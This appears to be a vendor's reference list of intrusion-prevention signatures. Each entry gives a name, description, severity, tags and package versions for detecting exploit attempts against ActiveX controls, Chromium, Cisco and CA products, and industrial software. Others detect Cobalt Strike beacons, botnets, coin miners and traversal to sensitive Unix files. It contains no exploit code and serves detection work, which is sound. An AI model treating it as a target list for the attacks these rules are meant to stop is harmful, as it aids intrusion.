Vulnerability: Broadwin-WebAccess-Client-Bwocxrun-ActiveX-Ocxspool-Format-String
Description:
Back to top

File-Text_CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution

About this situation: Exploit against Computer Associates eTrust Intrusion Detection detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates eTrust Intrusion Detection, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-CA-eTrust-Intrusion-Detection-CallCode-ActiveX-Control-Code-Execution
Description:
Back to top

File-Text_CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Computer Associates eTrust PestPatrol detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates eTrust PestPatrol, CVE2009, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-574-5211
Vulnerability: CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation

About this situation: An attempt to exploit a vulnerability in CA Host-Based Intrusion Prevention System detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CA Host-Based Intrusion Prevention System, CA Internet Security Suite, CVE2011, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-552-5211
Vulnerability: CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation
Description:
Back to top

File-Text_CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Computer Associates products detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, Computer Associates Unicenter Desktop Management Bundle, Computer Associates Unicenter Remote Control, Computer Associates Unicenter Software Delivery, Computer Associates Unicenter Asset Management, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-CA-Multiple-Products-ActiveX-Control-ListCtrl-AddColumn-BOF
Description:
Back to top

File-Text_CA-Multiple-Products-gui-cm-ctrls-ActiveX-Control-Memory-Corruption

About this situation: Attempt to exploit a memory corruption vulnerability in multiple Computer Associates products detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Computer Associates BrightStor ARCserve Backup for Laptops and Desktops, Computer Associates Desktop Management Suite, Computer Associates Desktop and Server Management, Computer Associates Unicenter Desktop Management Bundle, Computer Associates Unicenter Remote Control, Computer Associates Unicenter Software Delivery, Computer Associates Unicenter Asset Management, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-CA-Multiple-Products-gui_cm_ctrls-ActiveX-Control-Memory-Corruption
Description:
Back to top

File-Text_Cain-And-Abel-RDP-Buffer-Overflow

About this situation: An attempt to exploit a Cain and Abel RDP Buffer Overflow vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, Cain and Abel, CVE2008, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-801-5242
Last changed: sgpkg-ips-801-5242
Vulnerability: Cain-And-Abel-RDP-Buffer-Overflow
Description:
Back to top

File-Text_CakePHP-PHP-Injection-Unserialize-Attack

About this situation: A PHP Injection Unserialize Attack in CakePHP 1.3.x-1.3.5 and 1.28
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CakePHP, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-654-5211
Last changed: sgpkg-ips-659-5211
Vulnerability: CakePHP-PHP-Injection-Unserialize-Attack
Description:
Back to top

File-Text_Camtron-CMNC-200-Buffer-Overflow-CVE-2010-4230

About this situation: An attempt to exploit a vulnerability in Camtron CMNC-200 detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Camtron CMNC-200, CVE2010, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1788-5242
Last changed: sgpkg-ips-1788-5242
Vulnerability: Camtron-CMNC-200-Buffer-Overflow-CVE-2010-4230
Description:
Back to top

File-Text_CAPICOM-Utilities-ActiveX-Control-Vulnerable-Function-Call

About this situation: A vulnerable ActiveX function call detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft CAPICOM, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-587-5211
Last changed: sgpkg-ips-587-5211
Vulnerability: Microsoft-CAPICOM-Utilities-ActiveX-Control-Integer-Overflow-Denial-Of-Service
Description:
Back to top

File-Text_Centreon-Serverconnectionconfigurationservice.php-Command-Injection

About this situation: An attempt to exploit a vulnerability in Centreon Project Centreon detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Centreon, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1237-5242
Last changed: sgpkg-ips-1237-5242
Vulnerability: Centreon-Serverconnectionconfigurationservice.php-Command-Injection
Description:
Back to top

File-Text_Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8556

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-11, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1115-5242
Vulnerability: Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8556
Description:
Back to top

File-Text_Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8557

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Microsoft Edge, MS2018-11, CVE2018, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1115-5242
Last changed: sgpkg-ips-1115-5242
Vulnerability: Chakra-Scripting-Engine-Memory-Corruption-CVE-2018-8557
Description:
Back to top

File-Text_Chakra-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2018-8505

About this situation: An attempt to exploit a vulnerability in Microsoft Edge detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2018-10, CVE2018, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1108-5242
Last changed: sgpkg-ips-1283-5242
Vulnerability: Chakra-Scripting-Engine-Memory-Corruption-Vulnerability-CVE-2018-8505
Description:
Back to top

File-Text_Chrome-Safari-Floating-Styles-Use-After-Free-Code-Execution

About this situation: An attempt to exploit a vulnerability in WebKit Open Source Project WebKit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Chrome, CVE2011, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-424-4219
Last changed: sgpkg-ips-1283-5242
Vulnerability: Google-Chrome-And-Apple-Safari-Floating-Styles-Use-After-Free-Code-Execution
Description:
Back to top

File-Text_Chromium-and-Webkit-Iframe-Sandbox-Security-Bypass

About this situation: An attempt to exploit a vulnerability in Chromium and Webkit detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Safari, Chrome, Microsoft Edge, CVE2021, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1484-5242
Last changed: sgpkg-ips-1484-5242
Vulnerability: Chromium-and-Webkit-Iframe-Sandbox-Security-Bypass
Description:
Back to top

File-Text_Chromium-Out-Of-Bounds-Write-V8-CVE-2021-30632

About this situation: An attempt to exploit a vulnerability in Chromium detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, CVE2021, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1389-5242
Last changed: sgpkg-ips-1389-5242
Vulnerability: Chromium-Out-Of-Bounds-Write-V8-CVE-2021-30632
Description:
Back to top

File-Text_Chromium-V8-Turbofan-Type-Confusion

About this situation: An attempt to exploit a vulnerability in Chromium detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Chrome, CVE2020, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1406-5242
Last changed: sgpkg-ips-1406-5242
Vulnerability: Chromium-V8-Turbofan-Type-Confusion
Description:
Back to top

File-Text_Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems AnyConnect
Context: Text File Stream
Severity: 2
Tags: Windows, Any Hardware, Cisco Systems AnyConnect, CVE2011, Windows not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-576-5211
Vulnerability: Cisco-AnyConnect-VPN-Client-ActiveX-Code-Execution
Description:
Back to top

File-Text_Cisco-AnyConnect-VPN-Client-Software-Downgrade

About this situation: An attempt to exploit a vulnerability in Cisco Systems AnyConnect Secure Mobility Client detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Systems AnyConnect, CVE2012, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-483-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: Cisco-AnyConnect-VPN-Client-Software-Downgrade
Description:
Back to top

File-Text_Cisco-ASA-Line-Dancer-Malware-Implant-Interaction

About this situation: An attempt to exploit a vulnerability in Cisco Adaptive Security Appliance detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Adaptive Security Appliance, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1722-5242
Last changed: sgpkg-ips-1722-5242
Vulnerability: Cisco-ASA-Line-Dancer-Malware-Implant-Interaction
Description:
Back to top

File-Text_Cisco-Data-Center-Network-Manager-Createlanfabric-Command-Injection

About this situation: An attempt to exploit a vulnerability in Cisco Systems Data Center Network Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1233-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Createlanfabric-Command-Injection
Description:
Back to top

File-Text_Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal

About this situation: An attempt to exploit a vulnerability in Cisco Data Center Network Manager detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Data Center Network Manager, CVE2019, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1233-5242
Last changed: sgpkg-ips-1233-5242
Vulnerability: Cisco-Data-Center-Network-Manager-Reporttemplateuploadpolicy-Directory-Traversal
Description:
Back to top

File-Text_Cisco-IOS-XE-CVE-2023-20198-Implant-Detection

About this situation: An attempt to exploit a vulnerability in Cisco IOS detected
Context: Text File Stream
Severity: 7
Tags: Cisco IOS, Any Hardware, CVE2023, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1642-5242
Last changed: sgpkg-ips-1642-5242
Vulnerability: Cisco-IOS-XE-CVE-2023-20198-Implant-Detection
Description: CVE References: CVE-2023-20198
Back to top

File-Text_Cisco-Linksys-PlayerPT-ActiveX-Control-Buffer-Overflow

About this situation: An attempt to exploit a vulnerability in Linksys (Cisco Systems) PlayerPT detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Linksys PlayerPT, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-446-4219
Last changed: sgpkg-ips-578-5211
Vulnerability: Cisco-Linksys-PlayerPT-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Cisco-Linksys-PlayerPT-Buffer-Overflow

About this situation: An attempt to exploit a Cisco Linksys PlayerPT Buffer Overflow vulnerability detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Linksys PlayerPT, CVE2012, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-709-5211
Last changed: sgpkg-ips-709-5211
Vulnerability: Cisco-Linksys-PlayerPT-Buffer-Overflow
Description:
Back to top

File-Text_Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Systems Secure Desktop detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Cisco Secure Desktop, CVE2011, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-576-5211
Vulnerability: Cisco-Secure-Desktop-CSDwebinstaller-Code-Execution
Description:
Back to top

File-Text_Cisco-Webex-Magic-Url-Remote-Command-Execution

About this situation: Usage of a vulnerable Webwex Extension detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Cisco Webex Player, CVE2017, Windows not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-845-5242
Last changed: sgpkg-ips-1397-5242
Vulnerability: Cisco-Webex-Magic-Url-Remote-Command-Execution
Description:
Back to top

File-Text_Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF

About this situation: Attempt to exploit a buffer overflow vulnerability in Cisco Webex Meeting Manager detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Cisco Webex Meeting Manager, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: Cisco-Webex-Meeting-Manager-atucfobj-ActiveX-Control-BOF
Description:
Back to top

File-Text_Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in Cisco Webex Teams detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Cisco Webex Teams, CVE2019, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1158-5242
Last changed: sgpkg-ips-1282-5242
Vulnerability: Cisco-Webex-Teams-URI-Handler-Remote-Code-Execution
Description:
Back to top

File-Text_Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow

About this situation: Detects exploit attempts to Citrix Presentation Manager Server ICA Web Client ActiveX control.
Context: Text File Stream
Severity: 7
Tags: Windows, x86, Citrix Presentation Server, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: HTTP-Citrix-Presentation-Server-Client-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_Classid-Obfuscated-Reference

About this situation: Detected an obfuscated ActiveX ClassID
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-756-5211
Last changed: sgpkg-ips-756-5211
Vulnerability: Object-Classid-In-Nonstandard-Format
Description:
Back to top

File-Text_Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite

About this situation: Detected attempt to use vulnerable method of Clever Internet ActiveX Suite
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Clever Internet ActiveX Suite, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-571-5211
Vulnerability: Clever-Internet-ActiveX-Suite-Arbitary-File-Overwrite
Description:
Back to top

File-Text_Cobalt-Strike-Beacon-File

About this situation: Cobalt Strike beacon was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1383-5242
Vulnerability: Cobalt-Strike-Beacon-File
Description:
Back to top

File-Text_Cobalt-Strike-Injector-File

About this situation: Cobalt Strike injector file was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Suspected Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1383-5242
Last changed: sgpkg-ips-1761-5242
Vulnerability: Cobalt-Strike-Injector-File
Description:
Back to top

File-Text_CocoaPods-Trunk-Server-Remote-Code-Execution-CVE-2024-38366

About this situation: An attempt to exploit a vulnerability in CocoaPods detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CocoaPods, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1748-5242
Last changed: sgpkg-ips-1748-5242
Vulnerability: CocoaPods-Trunk-Server-Remote-Code-Execution-CVE-2024-38366
Description:
Back to top

File-Text_Code-Protect-Obfuscated-JavaScript-Detected

About this situation: Obfuscated JavaScript Detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1162-5242
Last changed: sgpkg-ips-1262-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Coinhive-Miner

About this situation: A Coinhive Cryprocurrency Miner embedded in a web page
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1274-5242
Last changed: sgpkg-ips-1274-5242
Vulnerability: Coinhive-Monero-JavaScript-Miner
Description:
Back to top

File-Text_Coinhive-Monero-JavaScript-Miner

About this situation: Coinhive Monero Javascript Miner detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Monero, Any Operating System not specific, Possibly Unwanted Content
First detected in: sgpkg-ips-1032-5242
Last changed: sgpkg-ips-1623-5242
Vulnerability: Coinhive-Monero-JavaScript-Miner
Description:
Back to top

File-Text_Coinminer-Trojan-Traffic

About this situation: An XMRig cryptocoin miner
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Any Operating System not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1528-5242
Last changed: sgpkg-ips-1528-5242
Vulnerability: Coinminer-Trojan-Traffic
Description:
Back to top

File-Text_Confluence-Improper-Authorization-CVE-2023-22518

About this situation: An attempt to exploit a vulnerability in Confluence detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Confluence, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1648-5242
Last changed: sgpkg-ips-1648-5242
Vulnerability: Confluence-Improper-Authorization-CVE-2023-22518
Description: CVE References: CVE-2023-22518
Back to top

File-Text_Connectwise-Screenconnect-Installextension-Directory-Traversal-CVE-2024-1708

About this situation: An attempt to exploit a vulnerability in ConnectWise ScreenConnect detected
Context: Text File Stream
Severity: 10
Tags: Any Operating System, Any Hardware, ConnectWise ScreenConnect, CVE2024, Any Operating System not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1697-5242
Last changed: sgpkg-ips-1757-5242
Vulnerability: Connectwise-Screenconnect-Installextension-Directory-Traversal-CVE-2024-1708
Description:
Back to top

File-Text_Contec-Conprosys-HMI-System-CVE-2023-28651-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Contec CONPROSYS HMI System (CHS) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Contec CONPROSYS HMI System, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1610-5242
Last changed: sgpkg-ips-1610-5242
Vulnerability: Contec-Conprosys-HMI-System-CVE-2023-28651-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_Contec-Conprosys-HMI-System-CVE-2023-29154-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Contec CONPROSYS HMI System (CHS) detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Contec CONPROSYS HMI System, CVE2023, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Vulnerability: Contec-Conprosys-HMI-System-CVE-2023-29154-SQL-Injection
Description:
Back to top

File-Text_Core-Services-And-OLE-Automation-SubstringData-Memory-Corruption

About this situation: An attempt to exploit a vulnerability in Microsoft XML Core Services and the Microsoft Object Linking and Embedding Automation library detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, MS2007-08, CVE2007, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-585-5211
Vulnerability: HTTP-Microsoft-Xml-Core-Services-Memory-Corruption-Vulnerability
HTTP-Microsoft-OLE-Automation-String-Manipulation-Heap-Overflow
Description:
Back to top

File-Text_Corrupt-RTF-Header

About this situation: Detects a corrupted RTF header
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Microsoft Office, Any Operating System not specific, Microsoft Office not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-492-5211
Last changed: sgpkg-ips-492-5211
Vulnerability: Corrupt-RTF-Header
Description:
Back to top

File-Text_Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit a buffer overflow vulnerability in the Creative Software AutoUpdate Engine ActiveX Control detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, Creative Software AutoUpdate, CVE2008, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-551-5211
Vulnerability: HTTP-Creative-Software-AutoUpdate-Engine-ActiveX-Control-Buffer-Overflow
Description:
Back to top

File-Text_CSU-Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036

About this situation: Detected attempt to exploit a vulnerability in Microsoft Internet Explorer
Context: Text File Stream
Severity: 7
Tags: Windows XP, Windows 2003, Windows Vista, Windows 2008 R2, Windows 2008, Any Hardware, Internet Explorer 7.0, Internet Explorer 6.0, Internet Explorer 8.0, MS2011-02, CVE2011, Windows XP not specific, Windows 2003 not specific, Windows Vista not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-1531-5242
Vulnerability: Microsoft-Internet-Explorer-Uninitialized-Memory-CVE-2011-0036
Description:
Back to top

File-Text_CYME-Multiple-Products-Chartfx-Remote-Code-Execution

About this situation: An attempt to exploit a vulnerability in CYME Distribution System Analysis detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, CYME Distribution System Analysis, CYME Power Engineering Software, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-489-5211
Last changed: sgpkg-ips-579-5211
Vulnerability: CYME-Multiple-Products-Chartfx.clientserver.core.dll-Remote-Code-Execution
Description:
Back to top

File-Text_Danmec-Trojan-Download

About this situation: DanMec download was detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-633-5211
Last changed: sgpkg-ips-633-5211
Vulnerability: Danmec
Description:
Back to top

File-Text_Darkness-Bot-Activity

About this situation: Darkness bot activity detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1708-5242
Vulnerability: Darkness-Bot
Description:
Back to top

File-Text_Darkshell-Botnet-Activity

About this situation: Darkshell Botnet activity detected
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, Windows not specific, Botnet, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-622-5211
Last changed: sgpkg-ips-622-5211
Vulnerability: Darkshell-Botnet
Description:
Back to top

File-Text_Data-Dynamics-ActiveBar-ActiveX-Control-actbar.ocx-Multiple-Insecure-Methods

About this situation: An attempt to exploit a vulnerability in Data Dynamics ActiveBar detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Data Dynamics ActiveBar, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-583-5211
Vulnerability: Data-Dynamics-ActiveBar-ActiveX-Control-actbar.ocx-Multiple-Insecure-Methods
Description:
Back to top

File-Text_Decimal-Encoded-JavaScript

About this situation: Decimal encoded JavaScript detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Suspected Attack Related Anomalies, Anomalies, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-954-5242
Last changed: sgpkg-ips-1429-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Decimal-Encoded-JavaScript-2

About this situation: Decimal encoded JavaScript detected
Context: Text File Stream
Severity: 2
Tags: Any Operating System, Any Hardware, Generic HTTP client, Any Operating System not specific, Generic HTTP client not specific, Other Suspicious Traffic, Anomalies
First detected in: sgpkg-ips-1429-5242
Last changed: sgpkg-ips-1429-5242
Vulnerability: JavaScript-Obfuscation
Description:
Back to top

File-Text_Delta-Industrial-Automation-Diaenergie-Handler_Cfg-Visual_Q_Add-SQL-Injection

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2024, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Handler_Cfg-Visual_Q_Add-SQL-Injection
Description:
Back to top

File-Text_Delta-Industrial-Automation-Diaenergie-Postenergytype-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1536-5242
Last changed: sgpkg-ips-1536-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Postenergytype-XSS
Description:
Back to top

File-Text_Delta-Industrial-Automation-Diaenergie-Setpf-Stored-Cross-Site-Scripting

About this situation: An attempt to exploit a vulnerability in Delta Electronics DIAEnergie detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, Delta Electronics DIAEnergie, CVE2022, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Vulnerability: Delta-Industrial-Automation-Diaenergie-Setpf-Stored-Cross-Site-Scripting
Description:
Back to top

File-Text_Destiny-Media-Player-Buffer-Overflow

About this situation: An attempt to exploit a Destiny Media Player Buffer Overflow vulnerability detected
Context: Text File Stream
Severity: 7
Tags: Windows XP, Any Hardware, Destiny Media Player, CVE2009, Windows XP not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-800-5242
Last changed: sgpkg-ips-800-5242
Vulnerability: Destiny-Media-Player-Buffer-Overflow
Description:
Back to top

File-Text_Directory-Traversal-To-Sensitive-Unix-File

About this situation: A potentially malicious file
Context: Text File Stream
Severity: 7
Tags: Linux, Any Hardware, Linux not specific, Suspected Disclosure, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-1070-5242
Last changed: sgpkg-ips-1345-5242
Description:
Back to top

File-Text_DivX-ActiveX-Browser-Plugin-Denial-of-Service

About this situation: An attempt to exploit a vulnerability in DivX Browser Plugin detected
Context: Text File Stream
Severity: 7
Tags: Any Operating System, Any Hardware, DivX Browser Plugin, CVE2007, Any Operating System not specific, Suspected Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-582-5211
Last changed: sgpkg-ips-582-5211
Vulnerability: DivX-ActiveX-Browser-Plugin-Denial-of-Service
Description:
Back to top

File-Text_DivX-Player-Subtitle-Parsing-Buffer-Overflow

About this situation: Suspicious subtitles file detected.
Context: Text File Stream
Severity: 7
Tags: Windows, Any Hardware, DivX Player, CVE2008, Windows not specific, Potential Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: DivX-Player-Subtitle-Parsing-Buffer-Overflow
Description:
Back to top

File-Text_DjVu-ActiveX-Control-Buffer-Overflow

About this situation: Attempt to exploit buffer overflow vulnerability in DjVu ActiveX Control for Microsoft Office detected
Context: Text File Stream
Severity: 10
Tags: Windows, Any Hardware, DjVu ActiveX Control for Microsoft Office, Windows not specific, Compromise, Severity over 4 Correlation Dependency Group
First detected in: sgpkg-ips-407-4219
Last changed: sgpkg-ips-573-5211
Vulnerability: DjVu-ActiveX-Control-Buffer-Overflow
Description:
Back to top

